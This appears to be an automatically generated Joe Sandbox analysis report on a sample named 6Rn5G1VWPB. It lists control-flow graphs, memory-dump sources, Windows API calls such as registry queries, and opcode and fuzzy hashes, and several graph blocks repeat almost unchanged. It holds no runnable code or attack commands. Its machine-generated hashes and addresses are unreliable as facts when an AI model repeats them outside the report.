                                  control_flow_graph 16617 10d1537-10d154e 16619 10d1559-10d155e 16617->16619 16870 10d155e call 10cc2de 16619->16870 16871 10d155e call 10cc338 16619->16871 16872 10d155e call 10cc388 16619->16872 16873 10d155e call 10cc3d8 16619->16873 16874 10d155e call 10cbdb8 16619->16874 16875 10d155e call 10cc044 16619->16875 16876 10d155e call 10cbda7 16619->16876 16877 10d155e call 10cc380 16619->16877 16621 10d1564-10d1576 16622 10d157d-10d15a6 16621->16622 16624 10d15ac-10d1608 16622->16624 16630 10d1613-10d1619 16624->16630 16881 10d161f call 10cdd5d 16630->16881 16882 10d161f call 10cdc38 16630->16882 16883 10d161f call 10cdc88 16630->16883 16884 10d161f call 10cdbe0 16630->16884 16885 10d161f call 10cdbf0 16630->16885 16631 10d1625-10d163c 16634 10d1647 16631->16634 16886 10d1649 call 10cde28 16634->16886 16887 10d1649 call 10cde20 16634->16887 16635 10d164f-10d166a 16638 10d1675 16635->16638 16859 10d1677 call 10cde28 16638->16859 16860 10d1677 call 10cde20 16638->16860 16639 10d167d-10d1698 16642 10d16a3 16639->16642 16861 10d16a5 call 10cde28 16642->16861 16862 10d16a5 call 10cde20 16642->16862 16643 10d16ab-10d16c6 16646 10d16d1 16643->16646 16863 10d16d3 call 10cde28 16646->16863 16864 10d16d3 call 10cde20 16646->16864 16647 10d16d9-10d16f4 16650 10d16ff 16647->16650 16868 10d1701 call 10cde28 16650->16868 16869 10d1701 call 10cde20 16650->16869 16651 10d1707-10d1773 LdrInitializeThunk 16652 10d1a8d 16651->16652 16653 10d1779-10d179d 16651->16653 16654 10d1a93-10d1aa5 16652->16654 16658 10d18ee-10d1912 16653->16658 16659 10d17a3 16653->16659 16657 10d1aac-10d1ad5 call 10ced1f 16654->16657 16663 10d1adb-10d1aed 16657->16663 16669 10d1918-10d191a 16658->16669 16670 10d1914 16658->16670 16659->16658 16661 10d17a9-10d18e2 16659->16661 16818 10d18e9 16661->16818 16666 10d1af4-10d1b1d 16663->16666 16674 10d1b23-10d1b35 16666->16674 16673 10d1921-10d194b 16669->16673 16671 10d191c 16670->16671 16672 10d1916 16670->16672 16671->16673 16672->16669 16681 10d194d 16673->16681 16682 10d1951-10d1953 16673->16682 16677 10d1b3c-10d1ba1 KiUserExceptionDispatcher 16674->16677 16865 10d1ba1 call 10cf41f 16677->16865 16866 10d1ba1 call 10cf368 16677->16866 16867 10d1ba1 call 10cf370 16677->16867 16684 10d194f 16681->16684 16685 10d1955 16681->16685 16686 10d195a-10d1960 16682->16686 16684->16682 16685->16686 16686->16652 16689 10d1966-10d1a59 16686->16689 16815 10d1a64 16689->16815 16692 10d1ba7-10d1bf3 16699 10d1edf-10d1ef0 16692->16699 16700 10d1bf9-10d1c1c 16692->16700 16706 10d2255-10d225c 16699->16706 16707 10d1ef6-10d1efd 16699->16707 16715 10d1ec7-10d1edc 16700->16715 16716 10d1c22-10d1c94 16700->16716 16710 10d22de-10d22e8 16706->16710 16711 10d2262-10d22d3 16706->16711 16713 10d1f94-10d1f9b 16707->16713 16714 10d1f03-10d1f09 16707->16714 16717 10d232e-10d2340 16710->16717 16718 10d22ea-10d2318 16710->16718 16711->16710 16719 10d210b-10d2112 16713->16719 16720 10d1fa1-10d20e6 16713->16720 16732 10d1f11 16714->16732 16733 10d1edd 16715->16733 16759 10d1eaf-10d1ec1 16716->16759 16760 10d1c9a-10d1ca1 16716->16760 16755 10d231f-10d2327 16718->16755 16719->16706 16726 10d2118-10d2238 16719->16726 16720->16706 16726->16706 16878 10d1f17 call 10cf788 16732->16878 16879 10d1f17 call 10cf787 16732->16879 16733->16733 16741 10d1f1d-10d1f3c 16758 10d1f47-10d1f57 16741->16758 16755->16717 16769 10d1f63 16758->16769 16759->16715 16759->16716 16764 10d1ca7-10d1dad 16760->16764 16765 10d1db2-10d1ddd 16760->16765 16764->16759 16765->16759 16770 10d1de3-10d1e86 16765->16770 16769->16706 16770->16759 16815->16652 16818->16652 16859->16639 16860->16639 16861->16643 16862->16643 16863->16647 16864->16647 16865->16692 16866->16692 16867->16692 16868->16651 16869->16651 16870->16621 16871->16621 16872->16621 16873->16621 16874->16621 16875->16621 16876->16621 16877->16621 16878->16741 16879->16741 16881->16631 16882->16631 16883->16631 16884->16631 16885->16631 16886->16635 16887->16635
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 40ba9497d990e491506c08a6a754083c3af28cd1bb5d563170137ba7c8a3d8f0
                                  • Instruction ID: 0b08ec682dcba6c580fc861579dab642428fcd5b918562f029c451c533bc04db
                                  • Opcode Fuzzy Hash: 40ba9497d990e491506c08a6a754083c3af28cd1bb5d563170137ba7c8a3d8f0
                                  • Instruction Fuzzy Hash: 9AE128B4A042288FCB64EB74C85879DB7F6AF88305F1085E9E949A3790DF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 16888 10d157f-10d1596 16890 10d15a1-10d15a6 16888->16890 16892 10d15ac-10d1608 16890->16892 16898 10d1613-10d1619 16892->16898 17132 10d161f call 10cdd5d 16898->17132 17133 10d161f call 10cdc38 16898->17133 17134 10d161f call 10cdc88 16898->17134 17135 10d161f call 10cdbe0 16898->17135 17136 10d161f call 10cdbf0 16898->17136 16899 10d1625-10d163c 16902 10d1647 16899->16902 17142 10d1649 call 10cde28 16902->17142 17143 10d1649 call 10cde20 16902->17143 16903 10d164f-10d166a 16906 10d1675 16903->16906 17146 10d1677 call 10cde28 16906->17146 17147 10d1677 call 10cde20 16906->17147 16907 10d167d-10d1698 16910 10d16a3 16907->16910 17129 10d16a5 call 10cde28 16910->17129 17130 10d16a5 call 10cde20 16910->17130 16911 10d16ab-10d16c6 16914 10d16d1 16911->16914 17137 10d16d3 call 10cde28 16914->17137 17138 10d16d3 call 10cde20 16914->17138 16915 10d16d9-10d16f4 16918 10d16ff 16915->16918 17144 10d1701 call 10cde28 16918->17144 17145 10d1701 call 10cde20 16918->17145 16919 10d1707-10d1773 LdrInitializeThunk 16920 10d1a8d 16919->16920 16921 10d1779-10d179d 16919->16921 16922 10d1a93-10d1aa5 16920->16922 16926 10d18ee-10d1912 16921->16926 16927 10d17a3 16921->16927 16925 10d1aac-10d1ad5 call 10ced1f 16922->16925 16931 10d1adb-10d1aed 16925->16931 16937 10d1918-10d191a 16926->16937 16938 10d1914 16926->16938 16927->16926 16929 10d17a9-10d18e2 16927->16929 17086 10d18e9 16929->17086 16934 10d1af4-10d1b1d 16931->16934 16942 10d1b23-10d1b35 16934->16942 16941 10d1921-10d194b 16937->16941 16939 10d191c 16938->16939 16940 10d1916 16938->16940 16939->16941 16940->16937 16949 10d194d 16941->16949 16950 10d1951-10d1953 16941->16950 16945 10d1b3c-10d1ba1 KiUserExceptionDispatcher 16942->16945 17139 10d1ba1 call 10cf41f 16945->17139 17140 10d1ba1 call 10cf368 16945->17140 17141 10d1ba1 call 10cf370 16945->17141 16952 10d194f 16949->16952 16953 10d1955 16949->16953 16954 10d195a-10d1960 16950->16954 16952->16950 16953->16954 16954->16920 16957 10d1966-10d1a59 16954->16957 17083 10d1a64 16957->17083 16960 10d1ba7-10d1bf3 16967 10d1edf-10d1ef0 16960->16967 16968 10d1bf9-10d1c1c 16960->16968 16974 10d2255-10d225c 16967->16974 16975 10d1ef6-10d1efd 16967->16975 16983 10d1ec7-10d1edc 16968->16983 16984 10d1c22-10d1c94 16968->16984 16978 10d22de-10d22e8 16974->16978 16979 10d2262-10d22d3 16974->16979 16981 10d1f94-10d1f9b 16975->16981 16982 10d1f03-10d1f09 16975->16982 16985 10d232e-10d2340 16978->16985 16986 10d22ea-10d2318 16978->16986 16979->16978 16987 10d210b-10d2112 16981->16987 16988 10d1fa1-10d20e6 16981->16988 17000 10d1f11 16982->17000 17001 10d1edd 16983->17001 17027 10d1eaf-10d1ec1 16984->17027 17028 10d1c9a-10d1ca1 16984->17028 17023 10d231f-10d2327 16986->17023 16987->16974 16994 10d2118-10d2238 16987->16994 16988->16974 16994->16974 17127 10d1f17 call 10cf788 17000->17127 17128 10d1f17 call 10cf787 17000->17128 17001->17001 17009 10d1f1d-10d1f3c 17026 10d1f47-10d1f57 17009->17026 17023->16985 17037 10d1f63 17026->17037 17027->16983 17027->16984 17032 10d1ca7-10d1dad 17028->17032 17033 10d1db2-10d1ddd 17028->17033 17032->17027 17033->17027 17038 10d1de3-10d1e86 17033->17038 17037->16974 17038->17027 17083->16920 17086->16920 17127->17009 17128->17009 17129->16911 17130->16911 17132->16899 17133->16899 17134->16899 17135->16899 17136->16899 17137->16915 17138->16915 17139->16960 17140->16960 17141->16960 17142->16903 17143->16903 17144->16919 17145->16919 17146->16907 17147->16907
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 8d66828270f052ef2da871fde448ebec5289b92147016739db81495ca2176772
                                  • Instruction ID: 058aabc78024c6ed87f66e94ef052bac178374c1f5341f2c8d8f45c68288af78
                                  • Opcode Fuzzy Hash: 8d66828270f052ef2da871fde448ebec5289b92147016739db81495ca2176772
                                  • Instruction Fuzzy Hash: 83E128B4A042288FCB64EB74C85879DB7F6AF88305F1085E9E949A3790DF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 17148 10d15c7-10d1608 17155 10d1613-10d1619 17148->17155 17384 10d161f call 10cdd5d 17155->17384 17385 10d161f call 10cdc38 17155->17385 17386 10d161f call 10cdc88 17155->17386 17387 10d161f call 10cdbe0 17155->17387 17388 10d161f call 10cdbf0 17155->17388 17156 10d1625-10d163c 17159 10d1647 17156->17159 17394 10d1649 call 10cde28 17159->17394 17395 10d1649 call 10cde20 17159->17395 17160 10d164f-10d166a 17163 10d1675 17160->17163 17398 10d1677 call 10cde28 17163->17398 17399 10d1677 call 10cde20 17163->17399 17164 10d167d-10d1698 17167 10d16a3 17164->17167 17402 10d16a5 call 10cde28 17167->17402 17403 10d16a5 call 10cde20 17167->17403 17168 10d16ab-10d16c6 17171 10d16d1 17168->17171 17389 10d16d3 call 10cde28 17171->17389 17390 10d16d3 call 10cde20 17171->17390 17172 10d16d9-10d16f4 17175 10d16ff 17172->17175 17396 10d1701 call 10cde28 17175->17396 17397 10d1701 call 10cde20 17175->17397 17176 10d1707-10d1773 LdrInitializeThunk 17177 10d1a8d 17176->17177 17178 10d1779-10d179d 17176->17178 17179 10d1a93-10d1aa5 17177->17179 17183 10d18ee-10d1912 17178->17183 17184 10d17a3 17178->17184 17182 10d1aac-10d1ad5 call 10ced1f 17179->17182 17188 10d1adb-10d1aed 17182->17188 17194 10d1918-10d191a 17183->17194 17195 10d1914 17183->17195 17184->17183 17186 10d17a9-10d18e2 17184->17186 17343 10d18e9 17186->17343 17191 10d1af4-10d1b1d 17188->17191 17199 10d1b23-10d1b35 17191->17199 17198 10d1921-10d194b 17194->17198 17196 10d191c 17195->17196 17197 10d1916 17195->17197 17196->17198 17197->17194 17206 10d194d 17198->17206 17207 10d1951-10d1953 17198->17207 17202 10d1b3c-10d1ba1 KiUserExceptionDispatcher 17199->17202 17391 10d1ba1 call 10cf41f 17202->17391 17392 10d1ba1 call 10cf368 17202->17392 17393 10d1ba1 call 10cf370 17202->17393 17209 10d194f 17206->17209 17210 10d1955 17206->17210 17211 10d195a-10d1960 17207->17211 17209->17207 17210->17211 17211->17177 17214 10d1966-10d1a59 17211->17214 17340 10d1a64 17214->17340 17217 10d1ba7-10d1bf3 17224 10d1edf-10d1ef0 17217->17224 17225 10d1bf9-10d1c1c 17217->17225 17231 10d2255-10d225c 17224->17231 17232 10d1ef6-10d1efd 17224->17232 17240 10d1ec7-10d1edc 17225->17240 17241 10d1c22-10d1c94 17225->17241 17235 10d22de-10d22e8 17231->17235 17236 10d2262-10d22d3 17231->17236 17238 10d1f94-10d1f9b 17232->17238 17239 10d1f03-10d1f09 17232->17239 17242 10d232e-10d2340 17235->17242 17243 10d22ea-10d2318 17235->17243 17236->17235 17244 10d210b-10d2112 17238->17244 17245 10d1fa1-10d20e6 17238->17245 17257 10d1f11 17239->17257 17258 10d1edd 17240->17258 17284 10d1eaf-10d1ec1 17241->17284 17285 10d1c9a-10d1ca1 17241->17285 17280 10d231f-10d2327 17243->17280 17244->17231 17251 10d2118-10d2238 17244->17251 17245->17231 17251->17231 17400 10d1f17 call 10cf788 17257->17400 17401 10d1f17 call 10cf787 17257->17401 17258->17258 17266 10d1f1d-10d1f3c 17283 10d1f47-10d1f57 17266->17283 17280->17242 17294 10d1f63 17283->17294 17284->17240 17284->17241 17289 10d1ca7-10d1dad 17285->17289 17290 10d1db2-10d1ddd 17285->17290 17289->17284 17290->17284 17295 10d1de3-10d1e86 17290->17295 17294->17231 17295->17284 17340->17177 17343->17177 17384->17156 17385->17156 17386->17156 17387->17156 17388->17156 17389->17172 17390->17172 17391->17217 17392->17217 17393->17217 17394->17160 17395->17160 17396->17176 17397->17176 17398->17164 17399->17164 17400->17266 17401->17266 17402->17168 17403->17168
                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 516cb026aea599f55472fc81c85528ba04bd6fb8ecf544908056771f1151b466
                                  • Instruction ID: b79a1c7e3827972f502736b998d8d3a500d542d13b7302ffb3608438a7dcc927
                                  • Opcode Fuzzy Hash: 516cb026aea599f55472fc81c85528ba04bd6fb8ecf544908056771f1151b466
                                  • Instruction Fuzzy Hash: 61E117B4A042288FDB64EB74C85879DB7F6AF88305F1085E9E949A3790DF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser
                                  • String ID:
                                  • API String ID: 6842923-0
                                  • Opcode ID: 686a3ce683499133b9e7413a9bcef07cf74f22fd15bd808793f68665ba637e49
                                  • Instruction ID: df2f6297b4383b5c6c6f863c0e537c7691e9914c2309d6952f41c5a5d94bf7e4
                                  • Opcode Fuzzy Hash: 686a3ce683499133b9e7413a9bcef07cf74f22fd15bd808793f68665ba637e49
                                  • Instruction Fuzzy Hash: 5C619E70A04228CFCB64EB74C8587ADB7F6AF88205F0084E9D909A7780DF389D85CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser
                                  • String ID:
                                  • API String ID: 6842923-0
                                  • Opcode ID: f963103316b3aadb441a0ca4c922d5ae728bf8b05e7e566772fe3fe2ee28d7b7
                                  • Instruction ID: 4d67250884e494c44fbc735f1dc988930fd0a0df6e3e2a788520fcdf6a060e0c
                                  • Opcode Fuzzy Hash: f963103316b3aadb441a0ca4c922d5ae728bf8b05e7e566772fe3fe2ee28d7b7
                                  • Instruction Fuzzy Hash: 8A518E70A00228CBCB64EB74C8587ADB7F6AF88205F1084E9D909A7780DF389DC5CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser
                                  • String ID:
                                  • API String ID: 6842923-0
                                  • Opcode ID: 346f06698c06155c5bdd189c0d6ad07f847ba82af1058b6f375169452ad86ce7
                                  • Instruction ID: 3b379f16bb41ca4fb35b548bef88a79298deb74f8a8587ec2b41f94ffa162b58
                                  • Opcode Fuzzy Hash: 346f06698c06155c5bdd189c0d6ad07f847ba82af1058b6f375169452ad86ce7
                                  • Instruction Fuzzy Hash: 3F518F74A04228CFCB64EB74C8587ADB7F6AF88205F5084E9D909A7784DF389D85CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914313245.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: df562c11f7b9b5636e2f948cf46d3e109bc52a2e772fc29045aee2a4168ee099
                                  • Instruction ID: 0ed37062529fd020f08aae1002699ad7833d408083929ce683b97e9a321a7c1c
                                  • Opcode Fuzzy Hash: df562c11f7b9b5636e2f948cf46d3e109bc52a2e772fc29045aee2a4168ee099
                                  • Instruction Fuzzy Hash: 5951A630A002059FCB04EBB4C884AAEB7F6AF89304F048569E556AB795DF70ED05CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser
                                  • String ID:
                                  • API String ID: 6842923-0
                                  • Opcode ID: f54b68bd1c45f52a3b18b5cc4cae260b4bb72d61d8e147579b20a643c2d01f1d
                                  • Instruction ID: 5db1447f130061d65ec37adf2467a0c69ae8a992f46e836b4cb9b9149b90928e
                                  • Opcode Fuzzy Hash: f54b68bd1c45f52a3b18b5cc4cae260b4bb72d61d8e147579b20a643c2d01f1d
                                  • Instruction Fuzzy Hash: BA518074B042298FCB64EB74C8587ADB7E6AF88205F1084E8D949E7784DF389D85CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914313245.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 268f590afe7f8d852eb935d92dd5d9e74be8227d6e6c39c6f0a7bc934092c95d
                                  • Instruction ID: df9e75af1128b64ac3c2b0f8a9c086abffb45dbaf0e29b17adc31e6a11e93b98
                                  • Opcode Fuzzy Hash: 268f590afe7f8d852eb935d92dd5d9e74be8227d6e6c39c6f0a7bc934092c95d
                                  • Instruction Fuzzy Hash: 8B41A730A002059FCB04EFB4C884BEEB7F6BF89204F148569E556EB755DF70E9058B61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 010CA5B9
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914313245.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: QueryValue
                                  • String ID:
                                  • API String ID: 3660427363-0
                                  • Opcode ID: d57f19821c0fd7a69728764c3fba30c8feb96941b511f4d99ea5f1ef7416f991
                                  • Instruction ID: b31a4c810c8f0de67a297695775315dfc09f9d2c9ee6eab0c240bfdd984c4884
                                  • Opcode Fuzzy Hash: d57f19821c0fd7a69728764c3fba30c8feb96941b511f4d99ea5f1ef7416f991
                                  • Instruction Fuzzy Hash: 654124B5E00258DFDB10CFA9C884ADEBFF1BB48704F15806AE859AB350D7749845CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 010CA2FC
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914313245.00000000010C0000.00000040.00000001.sdmp, Offset: 010C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10c0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 399a9746e09add8f69d46176f0d55de3b0d67d919766c10bfa9e4cece0181cc5
                                  • Instruction ID: b87f5e67feaa2e016c16717c05d74b71b86dadc0673eb23b49c2546ee3b93fa8
                                  • Opcode Fuzzy Hash: 399a9746e09add8f69d46176f0d55de3b0d67d919766c10bfa9e4cece0181cc5
                                  • Instruction Fuzzy Hash: AD412470A05249CFDB00CFA9C548A9EBFF1BB49304F25C1AEE809AB345D7B59849CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions